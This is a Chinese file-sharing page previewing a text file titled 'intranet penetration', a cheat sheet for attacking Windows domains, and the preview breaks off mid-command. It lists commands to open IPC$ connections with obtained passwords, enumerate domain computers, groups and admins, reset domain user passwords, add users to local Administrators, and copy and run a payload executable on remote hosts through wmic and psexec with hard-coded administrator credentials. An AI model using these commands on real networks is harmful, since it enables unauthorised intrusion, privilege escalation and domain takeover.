2.内网渗透.txt


立即下载 岁爵
2024-03-24
net 管理员 domain group 看域 查看 administrator 控制器 命令 90
1.9 KB

1.有了内网.我们建立SOCKS或者VPN是很有必要的2.一旦拥有密码,我们就可以尝试IPC连接,直接拿下域,这就得看你们的权限有多大。net use \\IP\ipc$ password /user:username@domain3.常用命令 net view 查看同一域/工作组的计算机列表 net view /domain 查看域/工作组列表 net view /domain:Secwing 查看Secwing域中 计算机列表 net group /domain 查看所在域的组 net user /domain 查看所在域用户 net user /domain zerosoul 12345678 修改域用户密码,需要域管理员权限,或者Ctrl+Alt+Del点击修改则不需要域管理员权限 net localgroup administrators SECWING\zerosoul /add 域Users组用户添加到本地Administrators组,需要本地管理员或域管理员在本机登陆域后进行 下面的命令 只能用于 域控制器: net group "Domain controllers" 查看域控制器(如果有多台) net group 查看域的组 net group "domain admins" 查看域管理员 net group "domain users" 查看域管理员 PS:打开配置域控制器向导的命令 dcpromo psexec /accepteula 绕过第一次验证窗口 mstsc/admin 解决hash无法抓出问题 wmic /node:172.16.19.96 /user:ABIMAQ\Administrator /password:k78m90 process call create c:\kav\2009.exe psexec.exe -s -u administrator -p k78m90 \\172.16.16.2 -c c:\kav\2009.exe 拷贝文件并且执行 psexec.exe -s -u administrator -p km3h7i \\172

net/管理员/domain/group/看域/查看/administrator/控制器/命令/90/ net/管理员/domain/group/看域/查看/administrator/控制器/命令/90/
-1 条回复
登录 后才能参与评论
-->